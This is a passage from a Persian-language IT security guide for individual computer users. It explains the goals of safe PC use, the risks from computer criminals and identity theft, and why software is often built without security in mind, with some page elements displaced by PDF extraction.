ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺍﺳﺖ.
ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ؛ ﻭﻟـﻲ ﺍﻳﻨﻜـﺎﺭ ﺑـﻪ
ﺍﻃﻼﻋﺎﺕ ،ﺯﻳﺮﻛﻲ ﻭ ﻣﺮﺍﻗﺒﺖ ﺷﺪﻳﺪ ﻧﻴﺎﺯ ﺩﺍﺭﺩ .ﺯﺑﺎﻥ ﺑﻜﺎﺭ ﺭﻓﺘﻪ ﺩﺭ
ﺍﻳﻦ ﺑﺤﺚ ﺑﻌﻀﹰﺎ ﺣﺎﻭﻱ ﻣﻔﺎﻫﻴﻢ ﻧﺎﻣﺄﻧﻮﺳﻲ ﻣـﻲﺑﺎﺷـﺪ .ﺑﻌـﻀﻲ ﺍﺯ
ﺍﺻﻄﻼﺣﺎﺕ ﻭ ﺗﻌﺎﺭﻳﻒ ﺩﺭ ﺿﻤﻴﻤﺔ ﺍﻧﺘﻬﺎﻱ ﺍﻳﻦ ﺑﺨﺶ ﺁﻣﺪﻩﺍﻧـﺪ ﻭ
ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻧﻴﺰ ﺩﺭ ﭘﻴﻮﺳﺖ ۱ﻛﺘﺎﺏ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﻃﺮﺡ ﺷﺪﻩﺍﻧﺪ.
ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺩﺭ ﺍﺭﺍﺋﻪ ﻳﻚ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺻﺤﻴﺢ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ
ﻣﻔﻬﻮﻡ "ﻛﺎﺭﺑﺮﺩ ﺻﺤﻴﺢ" ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻭ "ﺣﻔﺎﻇﺖ" ﺍﺯ ﺁﻧﻬـﺎ
ﻣﺸﺨﺺ ﺷﻮﺩ .ﺍﮔﺮ ﺷـﻤﺎ ﻧﻴـﺰ ﺑـﺪﻧﺒﺎﻝ ﻫﻤـﻴﻦ ﻣـﺴﺌﻠﻪ ﻫـﺴﺘﻴﺪ،
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ:
•
ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺘﺎﻥ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻲ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ ﻳـﺎ
ﭘﺎﻙ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺷﻤﺎ ﭼﻨﻴﻦ ﺧﻮﺍﺳﺘﻪﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ؛
•
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻃﺮﺍﺡ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺁﻧﺮﺍ
ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ )ﻣﮕﺮ ﻋﻴﺐ ﻭ ﻧﻘﺼﻬﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ،
ﻛﻪ ﻭﺟﻮﺩ ﺁﻧﻬﺎ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺍﺳﺖ(؛
•
ﻫﻴﭽﻜﺲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺍﺟﺎﺯﺓ ﺷﻤﺎ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ،ﺭﺍﻳﺎﻧـﻪ ﻭ
ﺷﺒﻜﺔ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ؛
•
ﺭﺍﻳﺎﻧﻪ ﺑﻄـﻮﺭ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺁﻟـﻮﺩﻩ ﺑـﻪ ﻭﻳـﺮﻭﺱ ﺭﺍ
ﻣﻨﺘﺸﺮ ﻧﻤﻲﻛﻨﺪ؛
•
ﻛﺴﻲ ﻗﺎﺩﺭ ﺑﻪ ﻣـﺸﺎﻫﺪﺓ ﺗﻐﻴﻴﺮﺍﺗـﻲ ﻛـﻪ ﺩﺭ ﺭﺍﻳﺎﻧـﻪ ﺍﻳﺠـﺎﺩ
ﻣﻲﻛﻨﻴﺪ ﻧﻴﺴﺖ؛
•
ﻛــﺴﻲ ﺗﻮﺍﻧــﺎﻳﻲ ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ ﺩﺍﺩﻩﻫــﺎﻱ ﺷــﻤﺎ ،ﭼــﻪ ﺩﺭ
ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻭ ﭼﻪ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺳﻴﻤﻲ ﺭﺍ ﻧﺪﺍﺭﺩ؛
•
ﺭﻭﻱ ﺳﻴــﺴﺘﻤﻬﺎ ﻭ ﻳــﺎ ﭘﺎﻳﮕﺎﻫﻬــﺎﻱ ﻭﺑــﻲ ﻛــﻪ ﺑــﻪ ﺁﻧﻬــﺎ
ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻳﺪ ﻛﺴﻲ ﻗﺎﺩﺭ ﺑﻪ ﺳـﺮﻗﺖ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ١ﻭ
ﺭﻣﺰ ﻋﺒﻮﺭ ٢ﻧﻴﺴﺖ؛
•
ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑـﻪ
ﺣﺴﺎﺏ ﺑـﺎﻧﻜﻲ ﺧـﻮﺩ ﺭﺍ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﺔ ﺍﻳﻨﺘﺮﻧـﺖ ﻭﺍﺭﺩ
ﻛﻨﻴــﺪ ،ﺩﺍﺩﻩﻫــﺎﻱ ﻣﺮﺑﻮﻃــﻪ ﺍﺯ ﺍﻣﻨﻴــﺖ ﻛﺎﻣــﻞ ﺑﺮﺧــﻮﺭﺩﺍﺭ
ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ )ﻣﺴﻠﻤﹰﺎ ﺷﻤﺎ ﺑﺮ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺳـﻮﻱ ﺩﻳﮕـﺮ ﺷـﺒﻜﺔ
ﺍﺭﺗﺒﺎﻃﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻨﺘﺮﻟﻲ ﻧﺨﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ(؛
•
ﻭ ...
ﭼﻨﺎﻧﭽﻪ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻫـﺎﻱ ﺷﺨـﺼﻲ ﻧﺎﺩﻳـﺪﻩ ﮔﺮﻓﺘـﻪ
ﺷﻮﻧﺪ ﭘﻴﺎﻣﺪﻫﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﻪ ﺑﺎﺭ ﻣـﻲﺁﻳـﺪ :ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻳـﻦ
ﭘﻴﺎﻣﺪﻫﺎ ﻣﻨﺠﺮ ﺑـﻪ ﺁﺯﺍﺭ ﺷـﺨﺺ ﮔﺮﺩﻧـﺪ ﻭﻟـﻲ ﻫﺰﻳﻨـﻪﺍﻱ ﺩﺭ ﺑـﺮ
ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺗﺤﻤﻴـﻞ ﻛﻨﻨـﺪ ﻭ ﻭﻗـﺖ
ﺑﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ ﺭﺍ ﺑـﻪ ﺧـﻮﺩ ﺍﺧﺘـﺼﺎﺹ ﺩﻫﻨـﺪ .ﺩﺭ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﻌﻨﻮﺍﻥ ﺣﺮﻓﺔ ﺷﺨﺺ ﻗﻠﻤﺪﺍﺩ ﻣﻲﺷـﻮﺩ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﻣﺸﻜﻞ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺑﺎﻋﺚ ﺑﻪ ﺧﻄﺮ ﺍﻓﺘﺎﺩﻥ ﻣﻮﻗﻌﻴﺖ ﺷﻐﻠﻲ
ﻭﻱ ﮔﺮﺩﺩ .ﺩﺭ ﺗﻤﺎﻣﻲ ﻣﻮﺍﺭﺩ ﺷﺨﺺ ﺑﺎﻳـﺪ ﺑـﻪ ﺍﺭﺯﻳـﺎﺑﻲ ﺍﺣﺘﻤـﺎﻝ
ﺧﻄﺮ ﺑﭙﺮﺩﺍﺯﺩ ﻭ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺭﺍ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ ﻭ ﺁﻧـﺮﺍ ﺍﺟـﺮﺍ
ﻧﻤﺎﻳﺪ .ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺟﺰﺋﻴـﺎﺗﻲ ﻛـﻪ ﺩﺭ ﺭﺍﺑﻄـﻪ ﺑـﺎ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ﻛـﻪ ﺑﺘـﻮﺍﻥ
ﺗﻤﺎﻣﻲ ﺟﻮﺍﻧﺐ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺭﺍ ﻛﻨﺘﺮﻝ ﻧﻤﻮﺩ.
ﭼﻨﺎﻧﭽﻪ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﻴـﺰ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ
ﺷﻮﻧﺪ ﻣﻲﺗﻮﺍﻥ ﺍﺣﺘﻤﺎﻝ ﺧﻄﺮ ﺭﺍ ﺗﺎ ﺣﺪ ﻗﺎﺑﻞ ﻗﺒﻮﻟﻲ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﻭ
ﺍﺯ ﺟﻬﺎﻥ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻬﻴﻨﻪ ﻧﻤﻮﺩ.
ﻃﺒﻴﻌﺘﹰﺎ ﺍﺭﺍﺋﻪ ﺗﻤﺎﻣﻲ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪ ﻫـﺎﻱ ﺷﺨـﺼﻲ ﺻـﺪﻫﺎ
ﺻﻔﺤﻪ ﻣﻄﻠﺐ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ ،ﺍﻣﺎ ﻣﺨﺎﻃﺒﻴﻦ ﻏﺎﻟﺒﹰﺎ
ﺗﻤﺎﻳﻞ ﭼﻨﺪﺍﻧﻲ ﺑﻪ ﻣﻄﺎﻟﻌﻪ ﻣﻄﺎﻟﺐ ﺍﻧﺒﻮﻩ ﻧﺪﺍﺭﻧـﺪ .ﺩﺭ ﺍﻳـﻦ ﻧﻮﺷـﺘﻪ
ﺧﻼﺻــﻪﺍﻱ ﺍﺯ ﺍﻃﻼﻋــﺎﺕ ﻻﺯﻡ ﺑــﺮﺍﻱ ﻛــﺎﺭﺑﺮﺍﻥ ﺟﻬــﺖ ﺩﺭﻙ ﻭ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳـﺖ.
ﻣﺮﺍﺟﻊ ﺫﻛﺮﺷﺪﻩ ﺩﺭ ﺑﺨﺶ ﺿﻤﺎﻳﻢ ﺷـﺎﻣﻞ ﻣﻨـﺎﺑﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ،
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺮﺗﺒﻂ ،ﻭ ﻣﺴﺘﻨﺪﺍﺕ ﭼﺎﭘﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻛﻤﻜﻬـﺎﻱ
ﻣﻔﻴﺪﻱ ﺑﺎﺷﻨﺪ ﻭ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﻪ ﻣﻄﺎﻟﻌﺔ ﺑﻴﺸﺘﺮ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻓﻨﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﺗﺸﻮﻳﻖ ﻧﻤﺎﻳﻨﺪ.
Username
Password
1
2
٤٩
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺗﺠـﺎﺭﻱ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺗﻮﺳـﻂ ﻛـﺎﺭﺑﺮ ﻧﻮﺷـﺘﻪ
ﺷﺪﻩﺍﻧﺪ.
•
ﺗﻬﺪﻳﺪﺍﺕ ﺟﻨﺎﻳﺘﻜﺎﺭﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ -ﻫﻤﮕﺎﻡ ﺑﺎ ﭘﻴـﺸﺮﻓﺘﻬﺎﻱ
ﻓﻨﺎﻭﺭﻱ ،ﮔﺮﻭﻫﻲ ﺍﺯ ﺧﺮﺍﺑﻜـﺎﺭﺍﻥ ﻛـﻪ ﺍﺯ ﺩﺯﺩﻱ ﺩﺍﺩﻩﻫـﺎﻱ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺳﻮﺩ ﻣﻲﺑﺮﻧﺪ ﻧﻴﺰ ﺑﻮﺟﻮﺩ ﺁﻣـﺪﻩﺍﻧـﺪ .ﺩﺭ ﻣـﻮﺍﺭﺩﻱ
ﺍﻳﻨﻜﺎﺭ ﺻﺮﻓﹰﺎ ﺑﺮﺍﻱ ﻟﺬﺕ ﻭ ﺳﺮﮔﺮﻣﻲ ﺻﻮﺭﺕ ﻣـﻲﮔﻴـﺮﺩ ﻭ
ﺑﺮﺧﻲ ﺍﻓﺮﺍﺩ ﻧﻴﺰ ﺗﻨﻬﺎ ﺑﺨﺎﻃﺮ ﺧﻮﺩﻧﻤﺎﻳﻲ ﺩﺭ ﺑﺮﺍﺑﺮ ﺩﻭﺳـﺘﺎﻥ
ﺧﻮﺩ ﺩﺳﺖ ﺑﻪ ﭼﻨﻴﻦ ﻛﺎﺭﻫﺎﻳﻲ ﻣـﻲﺯﻧﻨـﺪ؛ ﺍﻣـﺎ ﺩﺭ ﺑﻌـﻀﻲ
ﻣــﻮﺍﺭﺩ ﺍﻳﻨﻜــﺎﺭ ﺑــﺮﺍﻱ ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ ﻣﻨــﺎﻓﻊ ﺷﺨــﺼﻲ ﻭ
ﺳﺎﺯﻣﺎﻧﻲ ﺍﻧﺠﺎﻡ ﻣﻲ ﮔﻴﺮﺩ )ﺩﺯﺩﻱ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﻳـﺎ
ﻭﺭﻭﺩ ﺑﻪ ﻣﻌﺎﻣﻼﺕ ﻓﺮﻳﺒﻜﺎﺭﺍﻧﻪ( .ﺩﺭ ﺗﻤﺎﻣﻲ ﻣﻮﺍﺭﺩ ﻣـﺬﻛﻮﺭ ﺍﻳـﻦ
ﺍﺷﺨﺎﺹ ﺑﺎﻋﺚ ﺍﻳﺠﺎﺩ ﺧﺴﺎﺭﺕ ﻭ ﮔﺴﺘﺮﺵ ﺑﻲﺍﻋﺘﻤـﺎﺩﻱ
ﻣﻲﺷﻮﻧﺪ ﻭ ﺩﺭ ﺣﺪ ﮔﺴﺘﺮﺩﻩﺗﺮ ﻣﺸﻜﻼﺕ ﺑﺤﺮﺍﻧـﻲ ﺑﻮﺟـﻮﺩ
ﻣﻲﺁﻭﺭﻧﺪ ﻛﻪ ﺑﻪ ﺍﺷﺨﺎﺹ ﻭ ﻣﻮﻗﻌﻴﺘﻬـﺎﻱ ﺷـﻐﻠﻲ ﺻـﺪﻣﻪ
ﻭﺍﺭﺩ ﻣﻲﻛﻨﺪ .ﺑﺎﻳﺪ ﮔﻔﺖ ﺍﺯ ﺯﻣﺎﻧﻲ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﻣﻘﻴﺎﺱ
ﺟﻬﺎﻧﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ،ﺗﻌﻘﻴﺐ ﻭ ﻣﺘﻮﻗـﻒ
ﻛﺮﺩﻥ ﻣﻬﺎﺟﻤﻴﻦ ﻫﺮﭼﻨﺪ ﻫﻤﭽﻨﺎﻥ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ ﻣـﻲﺑﺎﺷـﺪ
ﻭﻟﻲ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﺷﺪﻩ ﺍﺳﺖ.
ﻓﺼﻞ ﺩﻭﻡ
ﺩﺭﻙ ﻣﻔﺎﻫﻴﻢ ﺍﻣﻨﻴﺘﻲ
ﻛﻠﻴﺎﺕ
ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺗﺒﻴـﻴﻦ ﺿـﺮﻭﺭﺕ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﻣﻨﻴـﺖ ﻭ ﺣﻔﺎﻇـﺖ ﺍﺯ
ﺷﺒﻜﻪ ﻭ ﺭﺍﻳﺎﻧﻪ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺭﺩ .ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﭘﻴﺎﻣﺪﻫﺎﻱ ﻧﻔﻮﺫ
ﺍﻣﻨﻴﺘﻲ ،ﺍﻗﺪﺍﻣﺎﺕ ﺍﻭﻟﻴﻪ ﺟﻬﺖ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻥ ،ﻭ ﻧﻴـﺰ ﭼﻨـﺪ ﺗﻌﺮﻳـﻒ
ﻓﻨﻲ ﺍﺯ ﻣﺒﺎﺣﺚ ﺍﻣﻨﻴﺘﻲ ﭘﺮﺩﺍﺧﺘـﻪ ﻣـﻲﺷـﻮﺩ .ﺗﻌـﺎﺭﻳﻒ ﻛـﺎﻣﻠﺘﺮ ﺩﺭ
ﺿﻤﻴﻤﻪ ۱ﻫﻤﻴﻦ ﻓﺼﻞ ﻭ ﻧﻴﺰ ﭘﻴﻮﺳﺖ ۱ﻛﺘﺎﺏ ﺫﻛﺮ ﺷﺪﻩﺍﻧﺪ.
ﭼﺮﺍ ﺗﻤﻬﻴﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺿﺮﻭﺭﺕ ﺩﺍﺭﻧﺪ؟
ﺩﺭ ﺍﻭﻟﻴﻦ ﺭﻭﺯﻫﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ
ﮔﺬﺍﺷﺘﻪﺷﺪﻩ ﺗﻨﻬﺎ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓـﺮﺍﺩ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﺷﺪ ﻭ ﻧﻴﺎﺯﻱ ﺑﻪ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﻧﺒـﻮﺩ .ﺑﻌـﺪ ﺍﺯ ﺁﻧﻜـﻪ
ﻛﺎﺭﺑﺮﺍﻥ ﺑﺪﺧﻮﺍﻩ ﺁﻏﺎﺯ ﺑﻪ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ ﻛﺮﺩﻧـﺪ
ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻧﻴـﺰ ﺑـﻪ ﺁﻥ ﺳﻴـﺴﺘﻤﻬﺎ ﺍﺿـﺎﻓﻪ ﺷـﺪﻧﺪ .ﺍﻣـﺮﻭﺯﻩ
ﺭﺍﻫﺒﺮﺍﻥ ﺑﻴﺶ ﺍﺯ ﻫﺮ ﺯﻣﺎﻥ ﺩﻳﮕﺮ ﺑﺎﻳﺪ ﺑﻪ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﻭ ﺭﺍﻳﺎﻧﻪﻫﺎ
ﺑﻴﺎﻧﺪﻳﺸﻨﺪ .ﻣﻬﻤﺘﺮﻳﻦ ﺩﻻﻳﻞ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
•
ﺍﺭﺯﺵ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺭﻭﻱ ﺗﺠﻬﻴـﺰﺍﺕ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻭ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ -ﻧﻜﺘﺔ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﺴﻴﺎﺭ ﮔﺮﺍﻧﻘﻴﻤﺖ ﻫﺴﺘﻨﺪ
ﻭ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺁﻧﻬﺎ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ .ﺣﺘـﻲ ﺍﮔـﺮ ﺩﺭ
ﻼ ﺍﺯ
ﻳﻚ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺳﺨﺖﺍﻓﺰﺍﺭﻫـﺎ ﻛـﺎﻣ ﹰ
ﺑﻴﻦ ﻧﺮﻭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﺎ ﺭﺍ ﻭﺍﺩﺍﺭ ﺑـﻪ
ﻧﺼﺐ ﻣﺠﺪﺩ ﻫﻤﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻛﻨﻨﺪ ﻭ ﻣﺘﻌﺎﻗﺒـﹰﺎ ﻻﺯﻡ ﺷـﻮﺩ
ﻛﻠﻴﺔ ﻧﻴﺎﺯﻫﺎﻱ ﺍﺳﺎﺳﻲ ﻣﺠﺪﺩﹰﺍ ﺗﻌﺮﻳـﻒ ﮔﺮﺩﻧـﺪ .ﺍﻳـﻦ ﺍﻣـﺮ
ﻣﺴﺘﻠﺰﻡ ﺻﺮﻑ ﺯﻣﺎﻥ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺍﺳﺖ؛ ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ
ﻓﺮﺩ ﻣﺴﺌﻮﻝ ،ﺍﻃﻼﻋﺎﺕ ﻓﻨﻲ ﻛﺎﻓﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻧﺪﺍﺷـﺘﻪ
ﺑﺎﺷﺪ.
•
ﻻ ﺩﺭ ﺑﻌﺪ ﺍﻣﻨﻴﺖ ﺿﻌﻒ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
ﭼﺮﺍ ﻣﻌﻤﻮ ﹰ
ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﻏﺎﻟﺒﹰﺎ ﺑﺪﻭﻥ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ
ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﻧﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻨﺪ ﺩﻟﻴﻞ ﺩﺍﺭﺩ:
•
ﺳﻬﻞﺍﻧﮕـﺎﺭﻱ -ﺑﺮﻧﺎﻣـﻪﻧﻮﻳـﺴﺎﻥ ﻭ ﻃﺮﺍﺣـﺎﻥ ﺍﺯ ﺍﻫﻤﻴـﺖ
ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺍﻃﻼﻋﻲ ﻧﺪﺍﺭﻧﺪ.
•
ﺍﻭﻟﻮﻳﺖ ﭘﺎﻳﻴﻦ -ﺗﺎ ﭼﻨﺪﻱ ﻗﺒﻞ ﺣﺘﻲ ﻛﺴﺎﻧﻲ ﻛﻪ ﻧـﺴﺒﺖ
ﺑﻪ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺁﮔـﺎﻫﻲ ﺩﺍﺷـﺘﻨﺪ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﻥ ﺍﻗـﺪﺍﻡ
ﭼﻨﺪﺍﻧﻲ ﻧﻤﻲﻛﺮﺩﻧﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﺗﻮﺟﻪ
ﻻﺯﻡ ﻭﺍﻗﻊ ﻧﻤﻲﺷﺪ.
ﺍﺭﺯﺵ ﺩﺍﺩﻩ ﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ -ﺍﻳﻦ ﺩﺍﺩﻩ ﻫـﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺷــﺎﻣﻞ ﻟﻴــﺴﺖ ﻣــﺸﺘﺮﻱﻫــﺎ ،ﭘــﺮﻭﮊﻩﻫــﺎﻱ ﻣــﺎﻟﻲ ﻭ ﻳــﺎ
Identity Theft
3
ﺑﺨﺶ ﺩﻭﻡ
•
ﺍﺭﺯﺵ ﺩﺍﺩﻩﻫﺎﻱ ﻓﺮﺩﻱ -ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎﻱ ﻓـﺮﺩﻱ
ﺍﺭﺯﺵ ﻣﺎﺩﻱ ﭼﻨﺪﺍﻧﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭﻟـﻲ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ
ﺁﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺯﻳﺎﻥﺁﻭﺭ ﺑﺎﺷﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺩﻭﺑﺎﺭﺓ ﺍﻃﻼﻋـﺎﺕ
ﺯﻣﺎﻥ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻻﺯﻡ ﺑﺎﺷﺪ )ﺗﻌـﺎﺭﻳﻒ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺳـﺮﻗﺖ
ﻫﻮﻳﺖ ٣ﺭﺍ ﻣﻮﺭﺩ ﻣﻼﺣﻈﻪ ﻗﺮﺍﺭ ﺩﻫﻴﺪ(.
٥٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
•
